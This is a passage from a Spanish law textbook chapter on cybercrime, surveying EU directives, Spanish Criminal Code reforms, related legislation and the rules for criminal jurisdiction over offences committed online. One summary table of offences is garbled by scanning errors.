mente cualificados para integrar el mandato de incriminación lanzado por las
Directivas a través de normas mínimas que definen las infracciones penales
y sus correspondientes sanciones, ello en virtud del art. 83.1 del Tratado de
Funcionamiento de la Unión Europea (TFUE). Pues bien, la necesidad de ga-
rantizar de forma eficiente la seguridad del tráfico generado en torno a las
TIC, ha desembocado en la adopción de ciertas Directivas al respecto y en el
propio TFUE se establece la posibilidad de incorporar, en el futuro, nuevos
delitos al catálogo original, que sin ser particularmente graves, coadyuven al
interés por aproximar las disposiciones legales y reglamentarias de los Estados
miembros en materia penal cuando resulte imprescindible para garantizar la
ejecución eficaz de las políticas de la UE en un ámbito que haya sido objeto de
armonización (art. 83.2), como ocurre con la cibercriminalidad (RoMEo CASA-
BONA, 2013; BARRIO ANDRÉS, 2018).

Las primeras manifestaciones legislativas en este contexto digital se pro-


dujeron a partir de 2001, con dos Comunicaciones que contenían una finali-
dad primordialmente sensibilizadora en torno a la inseguridad informática.

7 El documento final se puede consultar en: https://www.osce.org/mc/66113

- 172 -
Capítulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASlJII ACIÓN YMARCO LEGISLATIVO

La primera es la Comunicación de la Comisión al Consejo, al Parlamento Eu-


ropeo, al Comité Económico y Social y al Comité de las Regiones "Creación de una
sociedad de la información más segura mediante la mejora de la seguridad de las
infraestructuras de información y la lucha contra los delitos informáticos eEurope
2002", 26 de enero de 2001 [COM(2000) 890 final] . La segunda es la Comunicación
de la Comisión al Consejo, al Parlamento Europeo, al Comité Económico y Social y al
Comité de las Regiones "Seguridad de las redes y de la información: Propuesta para
un enfoque político europeo", de 6 de junio de 2001 [COM(2001) 298 final].

Las mismas dieron lugar, respectivamente, al Convenio de Budapest


arriba analizado, y a una serie de Directivas que han modelado los objetivos
de la denominada Estrategia europea de ciberseguridad, difundida por la Co-
misión Europea en 2013.
Comunicación conjunta al Parlamento Europeo, al Consejo, al Comité Econó-
mico y Social Europeo y al Comité de las Regiones "Estrategia de ciberseguridad
de la Unión Europea: Un ciberespacio abierto, protegido y seguro", 7 de febrero de
2013 [JOIN (2013) 1 final].

Frente a la indeterminación del precursor concepto de delincuencia in-


formática, la Comisión Europea, en 2007, emitió una definición propia de "ci-
berdelincuencia" en una Comunicación titulada Hacia una política general de
lucha contra la ciberdelincuencia, donde la ciberdelincuencia se circunscribía
a tres tipos de actividades delictivas: 1) delitos tradicionales a través de las
TIC; 2) contenidos ilegales a través de medios de comunicación electrónicos;
3) delitos específicos de las redes electrónicas (.ANGmTA OsUNA, 2018 ).
Lógicamente, el paraguas legislativo de la UE en materia de ciberdelin-
cuencia no se restringe al ámbito de la ciberseguridad stricto sensu. La idio-
sincrasia del uso de las TIC y su influyente atracción para la comisión de otras
conductas delictivas "analógicas" ha sido determinante en la promulgación
de Directivas, Reglamentos y Decisiones Marco comunitarios, que imponen a
los Estados miembros la obligación de adaptar, actualizar, o complementar su
normativa penal en múltiples direcciones, desde la pornografía infantil hasta
el blanqueo de capitales o la corrupción. Todas estas normas han forzado al
legislador español a llevar a cabo las dos últimas reformas del Código Penal
en 2010 y 2015, para adecuar el texto a las exigencias europeas, incorporan-
do nuevas categorías (ciber)delictivas o ampliando las ya existentes, como
veremos en el siguiente epígrafe. Por otra parte, el análisis de la ciberdelin-
cuencia y de la criminalidad organizada se complementa con los datos que
aporta el Centro Europeo de Ciberdelincuencia (EC3) de Europol, en relación
con actualizaciones estratégicas, políticas y tácticas sobre la lucha contra la
ciberdelincuencia, a través de informes emblemáticos sobre los hallazgos
clave, las amenazas emergentes y la evolución de la ciberdelincuencia, que

- 173 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

permiten a los Estados miembros responder al delito cibernético de manera


efectiva y concertada, en vista de que las amenazas cibernéticas afectan a los
gobiernos, las empresas y los ciudadanos de la UE.
Europol (Oficina Europea de Policía creada en 1999) es la agencia encargada
de velar por el cumplimiento de la ley en la UE, y anualmente desde 2014 publica un
informe titulado Internet Organised Crime Threat Assessment (IOCTA por sus siglas
en inglés). El IOCTA más reciente (2018) analiza, aparte de un área adicional de cri-
minalidad como son los mercados criminales en línea, tanto en la web de superficie
como en Darknet, la tecnología SG, además de abordar la convergencia entre el cibe-
respacio y el terrorismo 8•

En síntesis, vamos a exponer la normativa más relevante y reciente, or-


denada cronológicamente desde la más reciente:
Reglamento (CE) nº 2019 /881 del Parlamento Europeo y del Conse-
jo (en vigor el 27 de junio de 2019) relativo a ENISA (Agencia euro-
pea para la Ciberseguridad) y a la certificación de la ciberseguridad
de las tecnologías de la información y la comunicación, que deroga
el Reglamento 526/2013 (Reglamento sobre la Ciberseguridad).
El objeto es garantizar un nivel adecuado de ciberseguridad de los
productos, servicios y procesos de TIC en la UE, así corno evitar la
fragmentación del mercado interior en el terreno de los esquemas
de certificación de la ciberseguridad. Para lograr sus objetivos, in-
corpora un sistema de esquemas de certificación a escala de la UE,
y una Agencia de la UE para la Ciberseguridad que sustituye a la an-
terior Agencia de Seguridad de las Redes y de la Información de la
Unión Europea (ENISA).
Directiva 2016/1148/UE del Parlamento Europeo y del Consejo, de
6 de julio de 2016, relativa a las medidas destinadas a garantizar un
elevado nivel común de seguridad de las redes y sistemas de infor-
mación (Directiva NIS/SRI).
Reglamento (CE) nº 2016/679 del Parlamento Europeo y del Con-
sejo, de 27 de abril de 2016, relativo a la protección de las personas
físicas en lo que respecta al tratamiento de datos personales y a la
libre circulación de estos datos, que deroga la importante Directiva
95/46/CE (Reglamento general de protección de datos). La nove-
dad frente a la anterior regulación es que se puede aplicar, amén de
a las empresas o profesionales responsables o encargados del trata-
miento de los datos con domicilio social en Europa que presten ser-

8 Disponible en: https://www.europol.europa.eu/ activities-services/ main-reports/


internet-or9anised-crime-threat-assessment (último acceso 15.07.19)

- 174 -
Capítulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIFICACIÓN YMARCO LEGISLATNO

vicios a ciudadanos europeos, a aquellas empresas o profesionales


con domicilio social fuera de la UE, que, a consecuencia de la oferta
de bienes o servicios destinados a ciudadanos europeos, lleven a
cabo el tratamiento de sus datos.
Ej. 4.29 : Amazon, pues entre otros servicios, vende y entrega a domi-
cilio productos en Europa), o Google Analytics, que ofrece servicios de mo-
nitorización o análisis del comportamiento de usuarios en páginas web ).

Directiva 2015/2366/UE, de 25 de noviembre, sobre servicios de


pago en el mercado interior (Directiva PSD2 en vigor en España des-
de el 14 de septiembre de 2019).
Directiva 2014/42/UE, de 3 de abril, sobre el embargo y el decomiso
de los instrumentos y del producto del delito en la Unión Europea.
Directiva 2013/40/UE del Parlamento Europeo y del Consejo, de 12
de agosto, relativa a los ataques contra los sistemas de información
y la interceptación de datos electrónicos cuando no se trata de una
comunicación personal (sustituye a la Decisión Marco 2005/222/
JAI del Consejo de 24 de febrero de 2005, relativa a los ataques con-
tra los sistemas de información). La trasposición de dicha Directi-
va a nuestro derecho interno se produjo con la reforma del Código
Penal efectuada en 2015, a través de la LO 1/2015, de 30 de marzo,
que presta, como veremos, especial atención al fenómeno de la por-
nografía infantil.
Directiva 2011/36/UE, de 5 de abril de 2011, relativa a la preven-
ción y lucha contra la trata de seres humanos y a la protección de las
víctimas y por la que se sustituye la Decisión marco 2002/629 /JAI
del Consejo.
Directiva 2011/92/UE del Parlamento Europeo y del Consejo, de 13
de diciembre de 2011, relativa a la lucha contra los abusos sexuales
y la explotación sexual de los menores y la pornografía infantil y por
la que se sustituye la Decisión Marco 2004/68/JAI del Consejo.
Decisión Marco 2008/913/JAI, de 28 de noviembre de 2008, relati-
va a la lucha contra determinadas formas y manifestaciones de ra-
cismo y xenofobia mediante el Derecho Penal.
Decisión Marco 2008/919/JAI del Consejo, de 28 de noviembre de
2008, por la que se modifica la Decisión Marco 2002/475/JAI sobre
la lucha contra el terrorismo.

- 175 -
Cibercriminalidad.
gundo parte. ASPECTOS PENALES y CRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

Directiva 2006/24/CE del Parlamento Europeo y del Consejo, de 15


de marzo de 2006, sobre la conservación de datos generados otra-
tados en relación con la prestación de servicios de comunicaciones
electrónicas de acceso público o de redes públicas de comunicacio-
nes y por la que se modifica la Directiva 2002/58/CE.
Reglamento (CE) nº 460/2004 del Parlamento Europeo y del Con-
sejo, de 10 de marzo de 2004, por el que se crea la Agencia Europea
de Seguridad de las Redes y de la Información.
Decisión Marco 2004/757 /JAI del Consejo, de 25 de octubre de
2004, relativa al establecimiento de disposiciones mínimas de los
elementos constitutivos de delitos y las penas aplicables en el ámbi-
to del tráfico ilícito de drogas.
Decisión Marco 2003/568/JAI, de 22 de julio de 2003, relativa a la
lucha contra la corrupción en el sector privado.
Directiva 2003/06/ del Consejo, de 28 de enero de 2003, sobre las
operaciones con información privilegiada y la manipulación del
mercado.
Directiva 2002/58/CE del Parlamento Europeo y del Consejo, de 12
de julio de 2002, relativa al tratamiento de los datos personales y
a la protección de la intimidad en el sector de las comunicaciones
electrónicas (Directiva sobre la privacidad y las comunicaciones
electrónicas).

3. Marco legislativo nacional

El Código Penal español ha sufrido importantes modificaciones des-


de que la era de la informática e Internet comenzara su andadura, en unos
casos para adaptar determinados tipos penales ya existentes a nuevas for-
mas de comisión del delito concreto, y en otros para incorporar, de nuevo
cuño, la tipificación expresa de conductas especialmente relacionadas con
los llamados delitos informáticos (recordemos que esa era la nomencla-
tura habitual hace décadas hasta que el término ciberdelito se impuso al
ser el más manejado e inclusivo). En la actualidad continúa la dispersión
normativa y los ciberdelitos no cuentan con denominación propia ni ubi-
cación autónoma en el CP, tampoco existe un vínculo común en cuanto a
sistemática y bien jurídico protegido, que en muchos casos es de carácter
pluriofensivo. En este caso, las reformas más recientes y significativas son
las operadas por la LO 5/2010, de 22 de junio y la LO 1/2015, de 30 de
marzo, y la expansión de delitos clásicos ha sido abordada por dos vías: la

- 176 -
Capítulo 4. EL CIBERCR1MEN. DEFINICIÓN, CLASIFICACIÓN YMARCO LB ISLATIV

incorporación de subtipos penales que castigan nu evas modalidades co-


misivas en los delitos tradicionales, y la ampliación del objeto material
de los delitos que son susceptibles de ejecutarse a través de las TIC. Sin
mbargo, el legislador penal ha desenfocado por completo el objeto de
protección al insertar parte de los delitos contra la seguridad informática
n el Capítulo Primero, denominado "Del descubrimiento y revelación de
secretos", del Título X, que lleva por rúbrica "Delitos contra la intimidad,
1 derecho a la propia imagen y la inviolabilidad del domicilio" del Código
Penal. En efecto, centrar la atención, mediante la ubicación sistemática de
estos delitos, en la no intromisión en la vida privada y la protección del
derecho al secreto de los datos referentes a la misma, supone obviar la
mucho más amplia y compleja área de la seguridad informática. Esta in-
correcta ubicación (RUEDA MARTÍN, 2018; MORALES PRATS, 2016) llevará, ade-
más, como veremos al estudiar estos delitos en particular, a la incompren-
sión e injustificada crítica de una parte de la doctrina penal, que trata de
interpretarlos en función de la rúbrica bajo la que se regulan.
Lo que interesa proponer al lector es una síntesis de la relación de al-
gunos delitos que, sin haber sufrido ninguna alteración en cuanto a su ob-
jeto de protección originario, esto es, el bien jurídico protegido, también se
incluyen en el ámbito de la cibercriminalidad, precisamente por la nove-
dad del medio comisivo empleado, que siempre será de naturaleza digital 9 •
Comenzamos la exposición con una tabla que contiene, siguiendo el orden
sistemático del Código Penal, la relación de tipo penales preexistentes en
los que el método online es característico de nuevas modalidades comisivas
antes desconocidas en Derecho penal, dejando para el Capítulo siguiente el
estudio más profundizado tanto de los tipos penales considerados ciberde-
litos en sentido estricto como de algunos tipos penales dentro de los ciber-
delitos en sentido amplio.

9 El último informe sobre cibercriminalidad en España publicado por el Ministerio del


Interior en 2017 puede consultarse en: http://www.interior.gob.es/documents/ 10180/ 7146983/
Estudio+Ci bercriminalidad + 2017.pdf/a 93 7823d-Baf5-4baa-86fa-7jDBSf7caco 7

- 177 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

Delitos y nuevas formas comisivas por el uso de las TIC 1 º Artículos CP

16:añ
8~)
giru
~.
- y distribrifl6n er"2 '
!1\> ement,t la criminaÍización de Ja M·

;t:i\,q1,1e abarca'f ·;.:; ·~


- o (defin;lción e?t,Presa) · _ c) yd)
1 niqgrafíj .téc1.J;ica, e~ decil; aquella cCJm f
a slvamente con medios técnicos; y la d
p ci.r, ,i¡,qu,ell~ éIJ la que ··la imagel -del ~
e '?' · --, .,

✓ ' .,;; .

sÍi~;~tÍ>s; difusión, revelafu(m · o cesí


captadas o datos fücitamel'lte descubiettosonline;-
otjzad;· de imágenes· 'previam%te _·obtenidas ~
ento ~.la vlctirpa e,n lugar privado ~ Pornóvenganza o Reveng,e
~ , IntrµSisllia' :.infoirliatico· e ill.tetcéptac;ión de las c_omunicaciones·: ,¡
", espionaJ~iJlfórmático. ;. . '
•. i,,-GrabiJfié~,n~ aut6tiza · /ajenas Ónl
DEtITOS t;,o?ftRA fL HO
a
. , ias travé~ dé ia i;
s _graves a trayés"de

DELITOS CONTRA EL PATRIMONIO Y CONTRJtEL ORDEN SOCIOECONÓMICO.'.' 7


.'• Hu;toinform,ático . f • · .• t. : . ' t >·
• · Robo tecnológ¡cÓ: lnutÍÍizar sistemas de gua_rda criptográfica
• ,·( Ciber'J~extórsión
',
· ·,('
· · · '-"~ ,
.: ,, i, "'·
• _Estafa informática -phishing scam,,pharming sc,am: la manipq!ación informá ·
'
·◊

' o artÍficios:t~mejante,sustituyeal "el'lgai'ip" como elemento principal ' ,,


• .' Uso abusivo de equipos terminales de comunicación - phrea~ing
• 2,Dafios ,infol;Jiláticos l sabotaje'o crpekirig ,, ":, ;•
• ', Obstaculización o lnter,rupción de un sistema informático

10 La tabla recoge la mayoría de los delitos susceptibles de comisión a través de las TIC,
pero sugerimos que el lector realice una búsqueda comparativa con otros preceptos, p. ej,, los
relativos a fraudes fiscales, delitos contra la salud pública, o tráfico de armas,

- 178 -
Capitulo 4. EL CIBERCRJMEN. DEFINICIÓN, CLASIFICACIÓN YMARCO LEGISLATNO

f)EL,ITOS RELATIVOS ALI¡. . . . IAI.


• ~tión de · d V

· e d orL
síó
ygene
DELITOS RELATIVOS ALA
• fu.fracción· de ' derech
explotación exclusiva
, industiiá(prevlaméut
(Invención,, '"Modelos'
marcas ynombr-es com
DELITOS RELATIVOS
• Descubrimí
• Uso ¡(eg~l d
0

DELITOSDE . .
• Receptaciónon!ir,te: el;partado 1, l ) agrav'a la p
· de primera necesidad incluyendo serviciÓs de teleco
• Blanqueo on!ine (Onliríe Mone "iaundering):
ciber,dellncuencia o des !legales .
DELJTOS DE FALSEDAD .
• Falsificación de tarjetas de crédito y débito y cheques de viaje mediante progra
informáticos (en rela,cióncon el arr: 399 bis) , 1'
• Usurp_ación de estado civil onpne -s1,1plantación digi al de identidad 402 y ss: ·
• Usurpación de funciones públicas on!íne ' ·
INFIDELIDÁD EN M CUSTODIA DE DOCUMENTOS Y VIOLACIÓN DE SECRETOS
• Q~ebrantamiento de· un deber jurídico especial que obliga a los funcionarios :' .
p_a ra el buen fu1,1cionamiento d,e las Adm~nistraciones Públ\cas. Para coi:qp_arar la :413 - 418
modalidad comlsíva onlirie' con: las tradiciopaies a través de 'las TIC bastará con ,<'¡

conocer el enunciaao de los diferentes tipos


DELJTOS CONTRA 4, ADMJNISTRACIÓN DE ]USTICIA
• Quebrantamiento de· pena del art 48 . CP o medida cautelar similal"
-quebranta~iento digital de prohibición de comgnícación
DELITOS RELATIVOS Al EJERCICIO DE . LOS DERECHOS FUNDAMENTALES Y
LIBERTADES PÚBLICAS 510
• Xenofopia - delito de odio a través de las TIC
DELITOS DE DESÓRDENES PÚBLICOS ·.y
560.1
• Ataques a líneas o,instalaciones de,telec unicacíón
PERTENENCIA A ORGANIUCION S.;Y GRUPOS CRIMINALES
570 bis 2 c)
• Agrava la pena' del ttadic\ ' nencia" el h disponer de
570 ter 2 c)
medios tecnológicos.avanz
DELl'TOS DE TERRORISMO
• (Ciber) terrorjsnig
• Captación online 571 y-ss.
• Difusión del terrorismo onlfn
• Autoadiestt-ároiento o adiestramí,entQ
DELITOS DE DESCUBRIMiEN'l'O NES
RELATIVAS A LA DEFENSA NACIO
• :Revelación de infor~ació resei.:vada o secreta en 599. 2 9
medios de comun!cac1ón s e su difusióp (en relación
con el art. 598)

- 179 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMJNOLÓGICOS DE LA CRIMJNALIDAD RELACIONADA CON LAS TIC.

Cuando las conductas llevadas a cabo a través de las TIC no alcanzan el


grado de lesividad necesario para formar parte de la legislación penal, en mu-
chos casos sí constituyen ilícitos de naturaleza administrativa (p. ej., el envío
de spam), o de carácter civil. A estos efectos, el Instituto Nacional de Ciberse-
guridad de España (INCIBE), organismo dependiente de la Secretaría de Es-
tado para el Avance Digital del Ministerio de Economía y Empresa, dentro de
las funciones que tiene encomendadas para el desarrollo y aplicación de las
políticas de ciberseguridad, ha compilado en el llamado Código de Derecho
de la Ciberseguridad la legislación española que afecta a la ciberseguridad,
al objeto de contribuir a mejorar el conocimiento y facilitar la aplicación de
una normativa que afecta a una materia tan importante, pero a la vez tan va-
riable 11 .
El complejo entramado de normas que se mezclan con el mundo crimi-
nal en el ciberespacio, sectorial o materialmente, también forman parte del
régimen jurídico aplicable en nuestro ordenamiento interno, integrando en-
tre otras, las siguientes:
• LO 1/1982, de 5 de mayo, sobre protección civil del derecho al honor,
a la intimidad personal y familiar y a la propia imagen.
• LO 15 /1999, de 13 de diciembre, de Protección de Datos de Carácter
Personal.
• Ley Orgánica 5/2000, de 12 de enero, reguladora de la responsabili-
dad penal de los menores.
• Ley 11/2002, de 6 de mayo, reguladora del Centro Nacional de Inte-
ligencia.
• Ley 34/2002, de 11 de julio, de servicios de la sociedad de la infor-
mación y de comercio electrónico:
Regula el régimen jurídico de los servicios de la sociedad de
la información y de la contratación por vía electrónica: obliga-
ciones de los prestadores de servicios incluidos los que actúan
como intermediarios en la transmisión de contenidos por las
redes de telecomunicaciones, las comunicaciones comerciales
por vía electrónica, la información previa y posterior a la cele-
bración de contratos electrónicos, las condiciones relativas a su
validez y eficacia y el régimen sancionador aplicable a los pres-
tadores de servicios de la sociedad de la información.

11 Disponible en: https://www.boe.es/legislacion/ codigos/ codigo.php?id=173&nota= l&tab=2


(último acceso 15.07.19).

- 180 -
Capítulo 4. EL CIBERCRIMEN. DEFINICIÓN, C Altl'II 11 111 f Ali 11

• Ley 59 /2003, de 19 de diciembre, de firma electrónica.


• Real Decreto 421/2004, de 12 de marzo, por el que se regula el Cen-
tro Criptológico Nacional.
• Real Decreto 1553/2005, de 23 de diciembre, por el que se regula la
expedición del documento nacional de identidad y sus certificados
de firma electrónica.
• Real Decreto 1163/2005, de 30 de septiembre, por el que se regula
el distintivo público de confianza en los servicios de la sociedad de la
información y de comercio electrónico, así como los requisitos y el
procedimiento de concesión.
• Ley 11/2007, de 22 de junio, de acceso electrónico de los ciudadanos
a los Servicios Públicos.
• Ley 25/2007, de 18 de octubre, de conservación de datos relativos a las
comunicaciones electrónicas y a las redes públicas de comunicaciones:
Tiene por objeto la regulación de la obligación de los operado-
res de conservar los datos generados o tratados en el marco de
la prestación de servicios de comunicaciones electrónicas o de
redes públicas de comunicación, así corno el deber de cesión
de dichos datos a los agentes facultados, siempre que les sean
requeridos a través de la correspondiente autorización judicial
con fines de detección, investigación y enjuiciamiento de «deli-
tos graves» contemplados en el Código Penal o en las leyes pe-
nales especiales.
• Ley 56/2007, de 28 de diciembre, de Medidas de Impulso de la Socie-
dad de la Información:
Modifica algunos aspectos de la Ley 34/2002, de 11 de julio, de
Servicios de la Sociedad de la Información y de Comercio Elec-
trónico. También contempla modificaciones de la Ley 59 /2003,
de 19 de diciembre, de firma electrónica, así corno de la Ley
32/2003, de 3 de noviembre, General de Telecomunicaciones.
• Real Decreto 16 71/2009, de 6 de novíernbre, por el que se desarrolla
parcialmente la Ley 11/2007, de 22 de junio, de acceso electrónico
de los ciudadanos a los servicios públicos.
• Real Decreto 3/2010 de 8 de enero, modificado por el Real Decreto
951/2015, de 23 de octubre, que fija los principios básicos y requi-
sitos mínimos de seguridad, así corno las medidas de protección a
implantar en los sistemas de la Administración.

- 181 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

■ Real Decreto 704/2011, de 20 de mayo, por el que se aprueba el Re-


glamento de protección de las infraestructuras críticas.
■ Orden PRE/199 /2013, de 29 de enero, por la que se define el forma-
to de entrega de los datos conservados por los operadores de servi-
cios de comunicaciones electrónicas o de redes públicas de comuni-
caciones a los agentes facultados.
■ Ley 5/2014, de 4 de abril, de Seguridad Privada.
■ Ley 9/2014, de 9 de mayo, General de Telecomunicaciones.
■ Ley 36/2015, de 28 de septiembre, de Seguridad Nacional.
■ Ley 39/2015, de 1 de octubre, del Procedimiento Administrativo Co-
mún de las Administraciones Públicas.
■ Ley 40/2015, de 1 de octubre, de Régimen Jurídico del Sector Público.
■ Real Decreto 381/2015, de 14 de mayo, por el que se establecen me-
didas contra el tráfico no permitido y el tráfico irregular con fines
fraudulentos en comunicaciones electrónicas.
■ Ley Orgánica 4/2015, de 30 de marzo, de Protección de la Seguridad
Ciudadana.
■ Real Decreto-ley 12/2018, de 7 de septiembre, de seguridad de las
redes y sistemas de información.
■ Ley Orgánica 3/2018, de 5 de diciembre, de Protección de Datos Per-
sonales y garantía de los derechos digitales.
■ Orden PCI/487 /2019, de 26 de abril, por la que se publica la Estra-
tegia Nacional de Ciberseguridad 2019, aprobada por el Consejo de
Seguridad Nacional.
■ Ley 1/2019, de 20 de febrero, de Secretos Empresariales.

4. Aplicación espacial de la legislación y jurisdicción

4.1. Características relativas al lugar de comisión en la cibercriminalidad


Cuando hablamos de ciberdelincuencia, como ya hemos reiterado, no exis-
ten fronteras espaciales o geográficas y el anonimato del sujeto activo, por otra
parte, es un elemento complejo de sortear. Esta es la clave para entender por
qué resulta tan compleja la aplicación de la legislación pertinente en cada caso
y la determinación de los tribunales que ostentan jurisdicción para perseguir y
castigar conductas delictivas en el ciberespacio, es decir, las dificultades teóricas
y prácticas que plantea analizar las conductas típicas configuradas en el ecosis-
tema virtual y establecer el lugar de comisión del hecho (locus comissi delicti), la
ley aplicable (que a su vez determinará la jurisdicción) y el órgano judicial con-

- 182 -
Capitulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIPICACIÓN YMAR

creto que conocerá el caso en cuestión (competencia). MUÑoz MAcHADo (2000),


cargado de razón, realizó una descripción perfecta al declarar que "mientras
Internet se ha convertido en un medio de comunicación mundial, el espacio
por el que extiende sus dominios es plurijurisdiccional". Esa nueva dimensión
del espacio, radicalmente diferente al espacio físico, es determinante porque,
como veremos, las soluciones que ofrece la aplicación espacial del Derecho
penal y el ejercicio de la jurisdicción encuentran graves obstáculos cuando se
enfrentan al esqueleto de los sistemas informáticos, diluyéndose, por tanto, las
características de la llamada doble dimensión del espacio de la conducta (física
y nacional), propia de los ordenamientos jurídicos tradicionales (VELAsco SAN
MARTÍN', 2016; FLORES PRADA, 2015).

Las redes se basan en la universalidad, la horizontalidad y la dependencia


del código técnico. Esa supraterritorialidad de las redes informáticas choca con los
principios tradicionales utilizados, enmarcados en el criterio de la territorialidad.
Es más, lejos de una relativa capacidad de ser regulable, la Red está profundamente
deslocalizada y, por tanto, determinar donde se ha producido verdaderamente el
delito y qué jurisdicción es la competente para juzgarlo es muy complicado. Por otra
parte, los fueros de asignación de competencia en esta materia, son, como veremos,
tres: el fuero territorial, el de la nacionalidad del autor, y por último será competen-
te el Estado en el que se encuentre el presunto autor, y estas reglas se muestran in-
válidas en muchos casos, dada la fluidez multidireccional e instantánea de las redes
informáticas. Podríamos hablar entonces de ciberterritorialidad o aplicación cibe-
respacial de la ley penal, cuestión todavía pendiente de solución.

Ej. 4.30: Cada vez son más los dispositivos móviles que integran bots
para anticiparse a los gustos de los usuarios (asistentes virtuales de voz como
Siri de Apple, Alexa de Amazon, Cortana de Microsoft o Google Assistcmt). En-
tre ellos, la exitosa aplicación FaceApp, un programa que puede, entre otras
habilidades, envejecer de forma intencionada la fotografía de cualquier per-
sona, emplea un sistema neuronal basado en IA que analiza la fotografía que
se sube de forma automática a sus servidores para lograr los efectos de enve-
jecer o rejuvenecer al protagonista de la foto. En este caso los servidores se
encuentran en Rusia, y la política de privacidad es tremendamente vaga en
cuanto al destino de las imágenes y la falta de privacidad que conlleva usar
la aplicación. El hecho de que la base central se encuentre ubicada fuera de la
Unión Europea es un obstáculo para la aplicación de la legislación comunita-
ria sobre protección de datos, la más exigente de los países desarrollados.

4.2. La atribución de competencia jurisdiccional en la Decisión Marco


2009/948/JAI
En el marco europeo, el instrumento de atribución de la competencia
jurisdiccional, también salpicado por el reto sustantivo y procesal que supo-

- 183 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

ne la cibercriminalidad, es la Decisión Marco 2009 /948/JAI del Consejo, de


30 de noviembre de 2009 sobre la prevención y resolución de conflictos de
ejercicio de jurisdicción en los procesos penales. Esta Decisión es aplicable
a los procedimientos penales en general, pero representa prácticamente una
actualización de lo contenido en el Convenio de Budapest, que analizaremos
después. No obstante, la UE también se ha ocupado de dictar reglas especia-
les de jurisdicción y coordinación del enjuiciamiento, p. ej., en el ámbito de la
delincuencia organizada 12 •

4.3. La atribución de jurisdicción en la legislación española

En nuestro ordenamiento interno, la aplicación de la ley penal en el es-


pacio coincide con los criterios de atribución de la jurisdicción a los tribuna-
les españoles en el ámbito penal, siendo el principio de territorialidad, esto
es, el lugar de comisión del hecho delictivo, el criterio básico, que se reco-
ge en el art. 23 de Ley Orgánica del Poder Judicial (LOPJ). Además, existen
tres fueros extraterritoriales subsidiarios, determinados por el criterio de la
nacionalidad del autor (personalidad activa), el de la afectación a determi-
nados intereses nacionales (protección de intereses) y el destinado a evitar
la impunidad de los crímenes cometidos contra la comunidad internacional
(jurisdicción universal). Entonces, ¿en qué casos puede aplicarse la ley penal
española a un ciberdelito? La respuesta es en todos aquellos en que la juris-
dicción de los tribunales españoles venga atribuida por la ley española o por
un tratado internacional del que nuestro país sea parte.
Aunque el Derecho penal es competencia soberana de cada país, que la ejerce
de manera exclusiva en su territorio, existen supuestos de movilidad delincuencia!
que deben ser solucionados y para ello es imprescindible la cooperación entre paí-
ses. El problema es determinar la competencia penal de cada estado para perseguir
y sancionar un hecho delictivo (ley aplicable y competencia del órgano juzgador).
Así, las reglas que se aplican a esos supuestos son normas de derecho interno, pero
ajustadas a los principios de carácter internacional nacidos de los acuerdos firma-
dos con otros Estados.
► PRINCIPIO DE TERRITORIALIDAD. Es el principio general del lugar de co-
misión (locus regit actum), no importa la nacionalidad del sujeto y tam-
poco que el delito cometido no esté tipificado en su país -art. 8.1 Código
Civil: «Las leyes penales, las de policía y las de seguridad pública obligan a
todos los que se hallen en territorio español». El territorio es un concepto
jurídico, no geográfico exclusivamente, que comprende el espacio terres-
tre, marítimo y aéreo sometido a soberanía española La competencia de
los órganos penales españoles se establece en el art. 23.1 LOGP.

12 Decisión Marco 2008/841/JAI del Consejo, de 24 de octubre de 2008, relativa a la


lucha contra la delincuencia organizada.

- 184 -
11

► LUGAR DE COMISIÓN DEL DELITO (locus comlssi dellctt) ¿Qué ocurre


cuando la acción y el resultado se producen en lugares distintos, aunque
no sea lo más usual? La ley no dice nada al respecto, la interpretación se
realiza según las siguientes teorías:
• Teoría de la actividad: el delito se comete allí donde haya actuado su
autor (acción).
• Teoría del resultado: el delito se comete allí donde se producen sus
resultados.
• Teoría de la ubicuidad: aúna las dos y es la comúnmente aceptada. El
TS acogió la teoría de la ubicuidad en el Acuerdo no jurisdiccional del
Pleno de la sala Segunda, de 3 de febrero de 2005: "El delito se comete
en todas las jurisdicciones en las que se haya realizado algún elemen-
to del tipo. en consecuencia, el juez de cualquiera de ellas que primero
haya iniciado las actuaciones procesales será en principio competen-
te para la instrucción de la causa".
► EXTRATERRITORIALIDAD O ULTRATERRITORIALIDAD DE LA LEY PE-
NAL. Es supletoria respecto de la territorialidad, es decir, es una excep-
ción al principio de territorialidad que solo opera cuando el país donde se
cometan los hechos no pueda o no quiera juzgarlos.
• Principio de personalidad activa o de la nacionalidad (art. 23 .2 LOPJ) :
la ley nacional se aplica a hechos cometidos por españoles en el ex-
tranjero (le ley sigue al ciudadano español). El requisito más impor-
tante es la exigencia de doble incriminación (art. 23.2 a).
• Principio real o de protección de intereses nacionales (art. 23.3 LOPJ):
se aplica a aquellos hechos cometidos tanto por españoles como por
extranjeros fuera del territorio español, siempre que consistan en aten-
tados contra bienes jurídicos que protegen los intereses del estado.
• Principio de justicia universal (art. 23.4 LOPJ): se aplica a los hechos
cometidos tanto por españoles como por extranjeros fuera del terri-
torio español, siempre que consistan en atentados contra bienes jurí-
dicos reconocidos por la comunidad internacional. A raíz de la refor-
ma efectuada por LO 1/2014, de 13 de marzo, este principio ha sido
sometido a una profunda restricción.

Por otra parte, la determinación de la circunscripción concreta a la que le


corresponde la investigación del hecho (competencia), en virtud del art. 14 LE-
Crim, corresponde al juez de instrucción del partido judicial en el que se haya
cometido el delito. Este criterio, adoptado para resolver los problemas de com-
petencia surgidos en relación con la delincuencia tradicional, no es trasladable
al ámbito de la ciberdelincuencia (pensemos en que podemos referirnos tanto
al lugar donde está ubicado el equipo informático, como al lugar donde se pro-
duce el resultado, o bien al lugar donde está ubicado el servidor, entre otros).
Para resolver la indeterminación en cuanto a fijar el lugar de comisión, la juris-

- 185 -
Cibercriminalidad.
